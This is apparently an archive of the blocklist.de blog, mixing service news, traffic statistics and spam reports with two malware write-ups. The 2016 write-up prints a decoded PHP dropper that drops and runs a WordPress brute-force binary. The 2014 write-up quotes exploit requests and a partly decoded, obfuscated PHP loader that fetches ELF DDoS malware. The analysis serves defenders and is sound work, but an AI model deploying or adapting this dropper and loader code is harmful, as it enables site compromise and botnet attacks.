2010
04.23

Der Blog von www.blocklist.de wird hauptsächlich zum archivieren von Statistiken verwendet.

Wenn es mal was interessantes gibt, wird dies hier veröffentlicht. Dazu gehört z.B. neue Angriffe oder Wellen von neue Muster oder wenn eine Art von Angriffen einem Bot-Netz oder einem Wurm zugeordnet werden konnte.

-google-ads-
2021
04.29

MySQL Problems in the last Days

In the last Days, we had some mysql-Server issues.

The Server crashs and could only hard restarted.

We do yesterday a lot of analyze the Logfiles and optimize Settings.

We monitored the Server tonight with Debug Options, and it looks at the moment good.

We looking far on it, that he runs stable like before again.

 

Some Queries are now a little bit slower, but we work next on it again to optimize it.

Sorry for the Problems.

-google-ads-
2021
04.21

Current state. BlockList.DE is still alive

In the last years/month, it was very quite around blocklist.de

In the last time, we had changed a lot behind the System and drop a lot of Reports/Attacks, which are older then the current two Weeks.

Old stuff is already droped, but not good enough, so we got so much often Problems with the mysql-Server.

At the moment, it looks strange, because the Attacks are droping down from ~24k to 7k, but when we dont make a bug in, it will recover in the next days.

 

And so, yes blocklist.de is still alive 🙂

But it is a lot of work and i dont have enough time, so it is going slowly.

-google-ads-
2019
11.19

Bounce-Mails mit „: Command died with status 255″

In den letzten Tagen, kam es leider zu Bounce-Mails an die Fail2Ban Absender-Adresse mit einer Meldung wie:

<fail2ban@blocklist.de>: Command died with status 255

Dies ist nun gefixt.

 

 

Ebenso ist noch ein anderer Bug offen, wo ich noch dran bin.

Auch bei den Statistiken, aber das ist leider aufgrund der hohen Menge nicht gut zu skalieren und dort stoße ich immer wieder auf Probleme.

 

 

Und ja, das Projekt lebt noch und wird bald auch in Virustotal mit aufgenommen 🙂

Auch in der letzten Zeit, ist der Intervall, wann die Support-Mails abgearbeitet werden, etwas größer geworden, da bin ich schon dran. Alle Mails, welche aber zu alt sind, werden als „resolved“ markiert und somit ein Schnitt gemacht.

-google-ads-
2016
05.03

A half year ago, since the first News comes up, that the Updates for the Debian-LTS from Update is near EndOfLife, we have tried to upgrade the blocklist.de-Systems.
But it was to hard 🙁

Because there was a lot of Changes, which need to manually fixed.

We have copied the Data to a vps and worked with them. So we update the System -> crash… Rockbackup, fixed the Error, Update -> crash…. and again and again…….

After round about 6 Months later, we had fixed all Errors and run now all Systems with the latest Version of the OS.

After the first stable Updates, there was a some Bugs, we dont see, but the BlockList.de-User has informed and helped us, to fix this.

So, now the Blocklist.de-Site is almost as soon as the previous System (with a little bit more Caching).

 

Only the Munin-Pictures are broken at the moment, because there was too many Users for the Munin-System. But we work on it and for the most Graphs, the creating works again fine.

The Website has an A+-Raking at ssllabs now:

blocklist.de-ssllabs

https://www.ssllabs.com/ssltest/analyze.html?d=blocklist.de&s=185.21.103.31

 

blocklist.de-ssltools

https://de.ssl-tools.net/webservers/www.blocklist.de

 

 

And also the Mailsystem:

MX Server Pref Con-
nect
All-
owed
Can
Use
TLS
Adv
Cert
OK
TLS
Neg
Sndr
OK
Rcvr
OK
smtp-mx.blocklist.de
[93.180.154.80]
10 OK
(134ms)
OK
(135ms)
OK
(136ms)
OK
(137ms)
OK
(442ms)
OK
(136ms)
OK
(136ms)
FAIL *
smtp-mx2.blocklist.de
[46.252.26.16]
20 OK
(181ms)
OK
(182ms)
OK
(180ms)
OK
(180ms)
OK
(467ms)
OK
(183ms)
OK
(187ms)
FAIL *
webserver3.blocklist.de
[185.21.103.31]
70 OK
(140ms)
OK
(8,253ms)
OK
(131ms)
OK
(131ms)
OK
(443ms)
OK
(132ms)
OK
(141ms)
FAIL *
smtp-mx.blocklist.de
[93.180.154.80]
80 OK
(137ms)
OK
(136ms)
OK
(133ms)
OK
(133ms)
OK
(373ms)
OK
(134ms)
OK
(136ms)
OK
(251ms)

* = greylisting for the tested Address is active.

 

blocklist.de-ssltools-mx

https://de.ssl-tools.net/mailservers/smtp-mx.blocklist.de

What we have already build:

  • Info-Mail about Servers, which has send Reports without Logfiles
  • Info-Mail about Servers, which has send longer then 90 Days no Reports
  • Info-Mail about disabled Servers in your Profile (disabled due false-positives…..)

 

The next Step are:

  • to make the HTML and CSS ready for mobile devices.
  • a writeable API to add Servers or change settings
  • The Munin-Graphs zoom able
  • Live Attack Map like http://map.honeynet.org/ (currently offline) or http://www.sicherheitstacho.eu/
  • php7 for the Site/Api/Scripts
  • API complete as an REST-full api
  • Rsync Access for the rbl-Data
  • Upgrade the Abuse-Reports to the new (higher) dkim-key
  • Update the language Files (with google-translate) for french, chinese and more, that blocklist is available in more languages (and the Login-Sites too)
  • Generate the Statistics from the Blog (The raking from the countries and Companies) automatically.
-google-ads-
2016
01.03

WordPress BruteForce Attacks over hacked Joomla/WordPress-Sites from libworker.so/libso48.php

In the last Days, we see a lot of hacked WordPress/Joomla-Sites, which makes outgoing BruteForce-Login Attacks to other WordPress-Sites.

The Attackers create some Files with the name libso48.php, libso47.php, libso46.php and call them over GET-Requests with Parameter id:

domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC

The using UserAgent is with the String „–user-agent“:

" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"

 

The bad files check if the Server runs at x32 or x64 and compile a file libworker.so

The libworker.so File makes the attacks.

 

Code from the libso48.php (decoded):

<?php
header("Content-type: text/plain");
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code;
$so64 = Hex-Code;
//hexcode decoded start
............
fork
INFO Started brute forcing.

path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s) 
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s) 
Error.
<INFO> (%s:%d: errno: %s) 
Started xml rpc brute force
.........
//hexcode decoded end
 
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."
";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."
";
    fclose($f);
}
print "SO dumped ".file_put_contents("./libworker", $so)."
";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>

The complete Script is decoded under unphp.net (but with the decoded hex code):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/

On the Hexcode, which was written in the libworker.so file had the following code inside:

......

%s
}{
  "type" : "WPBF_RESPONSE",
  "success" : false,
  "site" : "%s",
  "user" : "%s"
}
Sending: %s
{
  "type" : "WPBF_RESPONSE",
  "success" : true,
  "site" : "%s",
  "user" : "%s",
  "pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s) 

You can see always, the Attacker use curl and Makes xmlrpc-BruteForce and normal wp-login.php WordPressBruteForce-Logins.

If you found the libso48.php or libworker.so File in your Webspace, please check, clean and update your software and stop running processes from libworker file.

-google-ads-
2015
03.06

Current Stats of BlockList.de (Traffic, User, Mysql-Load, Mails…)

The Traffic, Load, Users and other Statistics of blocklist.de for the Month 02.2015

 

Currently, blocklist.de has the following Stats/User:

User: 2,144

Server: 2,325

Attacks: 246,084,421 since 01.01.2014

Reports: 10,092,816 since 2012

Daily Mails: ~690,500 (lower limit) ~1,450,000 (high limit)

Web-Traffic: ~309 GB

RBL-/API-Traffic: ~85 GB

Mail (In/Out)-Traffic: ~~3,528 GB

Traffic over IPv6 (Mail, Web..): ~5GB

To this data, there comes 6,4TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,5 GB each Hour out.

The Mysql-Server use now 62% from 32GB Ram (~14gb Cache). And the System-Load is in average on 1.10 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,7. The open Connections are ~25,000 on the same time

 

The complete Traffic from all Systems are round about 6,6TB in 02/2015 (the Traffic from MySQL-Server over the not public IPs is not included).

-google-ads-
2014
10.10

Current Stats of BlockList.de (Users, MySQL-Load, Traffic, Mails….)

The Traffic, Load, Users and other Statistics of blocklist.de for the Month 09.2014

 

Currently, blocklist.de has the following Stats/User:

User: 1,719

Server: 1,932

Attacks: 282,138,414   since 05.05.2013

Reports: 8,572,275 since 2012

Daily Mails: ~750,400 (lower limit) ~1,250,000 (high limit)

Web-Traffic: ~290 GB

RBL-/API-Traffic: ~80 GB

Mail (In/Out)-Traffic: ~~3,315 GB

Traffic over IPv6 (Mail, Web..): ~5GB

To this data, there comes 6,1TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,4 GB each Hour out.

The Mysql-Server use now 60% from 32GB Ram (~14gb Cache). And the System-Load is in average on 2.40 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,6. The open Connections are ~23,000 on the same time

 

The complete Traffic from all Systems are round about 6,4TB in 09/2014 (the Traffic from MySQL-Server over the not public IPs is not included).

-google-ads-
2014
10.09

Statistics 09-2014 reborn

After 2 Years, we try to regenerate the Statistics over the countries from month to month again.

 

The Image (Up, down, same….) is the different from 2012 (last statistics):

 

Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).

Nach IP-Adressen sortiert (unique):

  1. 29182 CN
  2. 12068 VN
  3. 10280 IN
  4. 8157 US
  5. 7082 RU
  6. 14573 VN
  7. 5651 NoName
  8. 5216 VE
  9. 4054 BR
  10. 3986 UA

Sortiert nach Anzahl der Angriffe:

  1. 7805582 CN
  2. 6300587 US
  3. 1752518 US
  4. 1533083 PL
  5. 678569 NoName
  6. 537431 FR
  7. 175161 RU
  8. 35833 AT
  9. 35048 DE
  10. 32085 NoASN
-google-ads-
2014
09.17

The Attacks/Codes which injected the ELF ddos Malware from clodo.ru and others

I have some sites with outdated Software for a other Project.
Normally, the Site was secured with a .htaccess File. All Sites was secured by Quotas and other Tools and also monitored (sha1-filehash Checker, Processlist Checker…).

Two sites was now hacked, because the .htaccess was temporarily disabled and forgotten to reactivated.

Then there comes the following Requests to a outdated ModEvelution-Software:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx
"" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

The Post Variables was:
POST['n132a88'] = "ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7";
decoded it is only:
echo „qq11oadnq98cjnwejioln23++“;

A other Request was:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

A other Request was:

85.143.166.103 - - [07/Aug/2014:02:53:59 +0200] "POST http://ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7/assets/cache/docid_685.pageCache.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"

POST[„n0b8385“] = „JHMzOD0iV25cXGlhKm9tPX1ZVUJqd1EmZy1TTE1xXi90OlB+XHRkVFpdJzgoeGtARFwkMyMxXG4uNl9OaFIrWzl5cztDfGwhYiU1SWY0MkhPcEp1MEc8KVZgRlxye1gsRT5LXCJlY3pyIDdBdj8iOyAkR0xPQkFMU1sneHRrenA5NCddID0gJHMzOFs3MV0uJHMzOFs1MF0uJHMzOFs3MV0uJHMzOFs0OF0uJHMzOFs3M10uJHMzOFsxXS4kczM4WzRdLiRzMzhbN10uJHMzOFs4OV07ICRHTE9CQUxTWydmamlpYjUxJ10gPSAkczM4WzY2XS4kczM4WzczXS4kczM4WzFdLiRzMzhbOTBdLiRzMzhbMjVdLiRzMzhbM10uJHMzOFs2X
….
……
….
bGNyNTgnXSgkczM4LCAkczM4WzQ2XS4kczM4WzI0XS4kbnF3cnMwLCAkcHBvcWI0NykgPT0gRkFMU0UpIHsJCWlmICgkR0xPQkFMU1snandsY3I1OCddKCRzMzgsICRzMzhbMjRdLiRzMzhbMjVdLiRzMzhbN10uJHMzOFs3MV0uJHMzOFsyNF0uJG5xd3JzMCwgJHBwb3FiNDcpID09IEZBTFNFKSB7CQkJcmV0dXJuIEZBTFNFOwkJfSBlbHNlIHsJCQlyZXR1cm4gJHMzOFsyNF0uJHMzOFsyNV0uJHMzOFs3XS4kczM4WzcxXS4kczM4WzI0XS4kbnF3cnMwOwkJfQl9IGVsc2UgewkJcmV0dXJuICRzMzhbNDZdLiRzMzhbMjRdLiRucXdyczA7CX0JcmV0dXJuIEZBTFNFO30=“;

Decoded the sending Post Variable was:

$s38="Wn\\ia*om=}YUBjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D\$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G< )V`F\r{X,E>K\"eczr 7Av?";
$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89];
$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56];
$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1];

… Truncat against Kaspersky says it is an Virus…. aaaaaahhhhhhhh

=$s38[50].$s38[25].$s38[25].$s38[71].$s38[26].$s38[24].$s38[24].$s38[1].$s38[6].$s38[25].$s38[89].$s38[56].$s38[46].$s38[4].$s38[92].$s38[25].$s38[18].$s38[71].$s38[4].$s38[92].$s38[25].$s38[1].$s38[89].$s38[92].$s38[46].$s38[1].$s38[89].$s38[25].$s38[24].$s38[56].$s38[7].$s38[47].$s38[67];
$zxozz28 = $s38[83].$s38[40].$s38[78].$s38[19].$s38[49].$s38[48].$s38[19].$s38[85].$s38[19].$s38[19].$s38[65].$s38[70].$s38[49].$s38[48].$s38[58].$s38[70].$s38[70].$s38[87].$s38[65].$s38[85].$s38[8].$s38[27].$s38[1].$s38[72].$s38[37].$s38[27].$s38[40].$s38[21].$s38[55].$s38[27].$s38[3].$s38[44].$s38[55].$s38[90].$s38[31].$s38[14].$s38[52].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[75].$s38[37].$s38[73].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[13].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[40].$s38[64].$s38[42].$s38[90].$s38[69].$s38[65].$s38[35].$s38[70].$s38[13].$s38[65].$s38[91].$s38[49].$s38[31].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[55].$s38[27].$s38[40].$s38[64].$s38[73].$s38[30].$s38[13].$s38[14].$s38[42].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[68].$s38[27].$s38[40].$s38[64].$s38[73].$s38[10].$s38[31].$s38[14].$s38[91].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[50].$s38[27].$s38[40].$s38[64].$s38[17].$s38[90].$s38[31].$s38[14].$s38[14].$s38[21].$s38[13].$s38[67].$s38[25].$s38[10].$s38[69].$s38[85].$s38[35].$s38[27].$s38[7].$s38[64].$s38[42].$s38[27].$s38[75].$s38[71].$s38[68].$s38[30].$s38[1].$s38[65].$s38[67].$s38[20].$s38[19].$s38[44].$s38[13].$s38[10].$s38[0].$s38[80].$s38[37].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[74].$s38[52].$s38[20].$s38[0].$s38[64].$s38[42].$s38[27].$s38[40].$s38[64].$s38[17].$s38[30].$s38[91].$s38[37].$s38[22].$s38[30].$s38[1].$s38[32].$s38[55].$s38[70].$s38[58].$s38[74].$s38[25].$s38[10].$s38[75].$s38[49].$s38[68].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[44].$s38[13].$s38[10].$s38[91].$s38[95].$s38[56].$s38[90].$s38[7].$s38[71].$s38[55].$s38[27].$s38[3].$s38[44].$s38[17].$s38[30].$s38[91].$s38[14].$s38[52].$s38[90].$s38[83].$s38[90].$s38[35].$s38[4].$s38[1].$s38[32].$s38[68].$s38[90].$s38[13].$s38[17].$s38[25].$s38[20].$s38[83].$s38[80].$s38[68].$s38[10].$s38[42].$s38[32].$s38[37].$s38[20].$s38[69].$s38[49].$s38[42].$s38[32].$s38[42].$s38[12].$s38[94].$s38[20].$s38[42].$s38[72].$s38[13].$s38[90].$s38[69].$s38[10].$s38[56].$s38[10].$s38[0].$s38[44].$s38[96].$s38[20].$s38[0].$s38[78].$s38[6].$s38[49].$s38[19].$s38[37].$s38[55].$s38[4].$s38[1].$s38[65].$s38[52].$s38[20].$s38[83].$s38[80].$s38[42].$s38[27].$s38[40].$s38[64].$s38[73].$s38[32].$s38[7].$s38[95].$s38[35].$s38[4].$s38[69].$s38[6].$s38[55].$s38[21].$s38[13].$s38[95].$s38[52].$s38[20].$s38[0].$s38[64].$s38[7].$s38[10].$s38[40].$s38[14].$s38[8];
$ntgai94 = $GLOBALS['xtkzp94']($s38[56]);
$igekj52 = $GLOBALS['xtkzp94']($s38[7]);
echo $s38[76].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];
for (;;)
{
if (!$GLOBALS['fjiib51']($s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90]))
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[44].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[56].$s38[50].$s38[89].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[86];
break;
}
if ($ntgai94 !== $s38[20].$s38[3].$s38[1].$s38[73].$s38[37])
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[68].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[60].$s38[3].$s38[1].$s38[73].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$mqcjh70.$s38[86];
break;
}
$nneyn30 = $s38[71].$s38[56];
$cttgs64 = "";
if ($GLOBALS['aojaf86']($GLOBALS['dfyoo42'](~0)) == 64)
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[47].$s38[67].$s38[86];
$cttgs64 = $rmznz0;
}
else
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[42].$s38[68].$s38[86];
$cttgs64 = $dfdjy19;
}
$pjimj72 = "";
if (!$GLOBALS['gwigy41']($nneyn30))
{
$pjimj72 = $GLOBALS['vziql67']($s38, $cttgs64, $nneyn30);
if ( $pjimj72 == FALSE)
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[67].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[30].$s38[6].$s38[14].$s38[1].$s38[60].$s38[93].$s3... Truncat against Kaspersky says it is an Virus.... aaaaaahhhhhhhh
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[64].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[30].$s38[6].$s38[1].$s38[89].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[68].$s38[8].$cgthg36.$s38[86];
$GLOBALS['tkjre65'](1);
$GLOBALS['jtjiv94']($pjimj72);
break;
}
echo $s38[76].$s38[24].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];

function fildv12($s38, $htxbt38)
{
$ppoqb47 = „“;
$ogrpt28 = @$GLOBALS[‚fjcva91‘]($htxbt38, $s38[92].$s38[62]);
if ($ogrpt28 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[90].$s38[73].$s38[92].$s38[60].$s38[48].$s38[3].$s38[1].$s38[3].$s38[25]))
return FALSE;
$henof76 = @$GLOBALS[‚dmrqg14′]();
@$GLOBALS[’npbou10′]($henof76, CURLOPT_URL, $htxbt38);
@$GLOBALS[’npbou10‘]($henof76, CURLOPT_RETURNTRANSFER, true);
$ppoqb47 = @$GLOBALS[‚hjiar61‘]($henof76);
@$GLOBALS[‚ekyyn43‘]($henof76);
}
else
{
while(!$GLOBALS[‚mashg65‘]($ogrpt28))
$ppoqb47.=$GLOBALS[‚udsvx59′]($ogrpt28, 1024 * 64 );
$GLOBALS[’naftp70‘]($ogrpt28);
}
return $ppoqb47;
}

function eghou87($s38, $yaxje72, $ppoqb47)
{
$negtx78 = $GLOBALS[‚fjcva91‘]($yaxje72, $s38[14].$s38[62].$s38[52]);
if ($negtx78 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[66].$s38[3].$s38[60].$s38[89].$s38[48].$s38[71].$s38[73].$s38[25].$s38[48].$s38[90].$s38[6].$s38[1].$s38[25].$s38[89].$s38[1].$s38[25].$s38[56]))
return FALSE;
if ( @$GLOBALS[‚wtxbv81‘]($yaxje72, $ppoqb47) === FALSE )
return FALSE;
}
else
{
$jznmi77 = $GLOBALS[‚acklf72‘]($negtx78, $ppoqb47, $GLOBALS[‚aojaf86′]($ppoqb47));
$GLOBALS[’naftp70‘]($negtx78);
if ($jznmi77 == FALSE || $jznmi77 != $GLOBALS[‚aojaf86‘]($ppoqb47))
return FALSE;
}
return TRUE;
}

function gbzrm90($s38, $htxbt38, $nqwrs0)
{
$ppoqb47 = $GLOBALS[‚adwwg63‘]($s38, $htxbt38);
if ($ppoqb47 == FALSE)
return FALSE;
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[46].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
return FALSE;
}
else
{
return $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0;
}
}
else
{
return $s38[46].$s38[24].$nqwrs0;
}
return FALSE;
}

A short lock shows, that the Code check with php_uname the System and downloads a xxxx64/xxxx32 File which was analysed from our Friends from MalwareMastDie under:
http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html

For more Informations and Updates, you can follow MalwareMustDie on Twitter:
https://twitter.com/MalwareMustDie


So, please update and secure all your sites and scripts!

If you have Questions, please contact us 🙂

-google-ads-
2014
03.20

massive Spam to postmaster@blocklist.de from .br-Domains

Today, we received a lot of Spammails like:

Presente para voce, consumidor: ate 60% off em pecas selecionadas
Você Merece o Melhor
Atencao, anapaula@pacaluz.com.br  Casas Bahia Informa como aprovado seu pedido n. 18977
Este vendedor ainda trabalha com você?

and other to our Postmaster-Address. Today it was over 1650 Mails.
We have report them over spamcop.net to the Abuse-Departments of the Source and the Abuse-Department from the Links in the Body of mails.
The most Spammails has in the Message-ID only @localhost.localdomain and used in the return-path Addresses like "bounce-xxx", "return-xxx" and other:

Return-Path: <return@baratomail4.com.br>
Delivered-To: root@blocklist.de
Received: by mail.blocklist.de (Postfix, from userid 1001)
	id 80DDE2F1B70; Thu, 20 Mar 2014 06:53:39 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 80DDE2F1B70
Authentication-Results: mail.blocklist.de; dkim=permerror
	(verification error: empty key record; insecure key)
	header.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	server5.customer-config.de
X-Spam-Level: ****
X-Spam-ASN:  
X-Spam-Status: No, hits=4.4 required=5.5 tests=BAYES_00=-6.1,
	DATE_IN_PAST_06_12=1.543,HTML_IMAGE_RATIO_02=0.437,HTML_MESSAGE=0.001,
	MIME_HTML_ONLY=0.723,RCVD_IN_SBL=0.7,RDNS_NONE=0.793,URIBL_BLACK=1.725,
	URIBL_DBL_SPAM=1.7,URIBL_JP_SURBL=1.25,URIBL_WS_SURBL=1.608 bayes=0.0000
	relaysuntrusted=[ ip=2a01:4f8:150:74e2::4 rdns= helo=webserver2.blocklist.de
	by=mail.blocklist.de ident= envfrom= intl=0 id=3EED02F1A6A auth= msa=0 ] [
	ip=200.216.198.85 rdns=mx.grupotreviso.com.br helo=grupotreviso.com.br
	by=webserver2.blocklist.de ident= envfrom= intl=0 id=422901E400A0 auth= msa=0
	] [ ip=187.85.79.35 rdns= helo=rdns-6.baratomail4.com.br by=QA-Mail ident=
	envfrom= intl=0 id= auth= msa=0 ] autolearn=disabled scanned=[Thu, 20 Mar
	2014 06:53:39 +0100] version=3.3.1
Received: from webserver2.blocklist.de (unknown [IPv6:2a01:4f8:150:74e2::4])
	(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by mail.blocklist.de (Postfix) with ESMTPS id 3EED02F1A6A
	for <root@blocklist.de>; Thu, 20 Mar 2014 06:53:27 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 3EED02F1A6A
Received: by webserver2.blocklist.de (Postfix, from userid 1000)
	id E13FF1E400A0; Thu, 20 Mar 2014 06:53:26 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 webserver2.blocklist.de E13FF1E400A0
Authentication-Results: webserver2.blocklist.de; dkim=permerror
	(verification error: empty key record; insecure key)
	header.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)
Received-SPF: none (baratomail4.com.br: No applicable sender policy available) receiver=webserver2.blocklist.de; identity=mailfrom; envelope-from="return@baratomail4.com.br"; helo=grupotreviso.com.br; client-ip=200.216.198.85
X-DKIM: OpenDKIM Filter v2.0.1 webserver2.blocklist.de 422901E400A0
Received: from grupotreviso.com.br (mx.grupotreviso.com.br [200.216.198.85])
	by webserver2.blocklist.de (Postfix) with SMTP id 422901E400A0
	for <postmaster@blocklist.de>; Thu, 20 Mar 2014 06:53:24 +0100 (CET)
X-Qamailsafe-Spam-Score: 99
X-QamailSafe-Checksum: d599ce04b77699878cd55c7db6dd10258f298098e6d9af032a8ba934ebd2cb5f
X-QamailSafe-Source-Addr: 187.85.79.35
Received: from 187.85.79.35 (EHLO rdns-6.baratomail4.com.br)
  by QA-Mail Safe 7.0.14; Thu, 20 Mar 2014 00:38:26 -0300
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=default; d=baratomail4.com.br;
 h=To:Subject:Message-ID:Date:From:Reply-To:MIME-Version:List-Unsubscribe:Content-Type:Content-Transfer-Encoding; i=abuse@baratomail4.com.br;
 bh=PL8mxp19/Mo2fJ7ycxAwI4XUbVc=;
 b=iU0HK1hDwSOSnC92NnJXgqAoNV/7UQtZMD0lsY8w5otEjd/s6cijPH7e8yy/EsviWMz6g/ligLCs
   cZIQFgUOOHJ50JmqbUq9Uc3VImqdlqF2iBnz6/LHa4e6h90ZX++YwDsxkA6d8ZaX1kaZxeS9cnb3
   tdhFtYxY5JrUk/BDG0E=
To: vas.sl@grupotreviso.com.br
Subject: =?UTF-8?B?Vm9jw6ogTWVyZWNlIG8gTWVsaG9y?=
Message-ID: <b3164728023c9761cb7ff3db18d1a3be@baratomail4.com.br>
Date: Wed, 19 Mar 2014 15:17:21 -0300
From: "Sabor e Estilo" <send@baratomail4.com.br>
Reply-To: send@baratomail4.com.br
MIME-Version: 1.0
X-Mailer-LID: 8,6,5
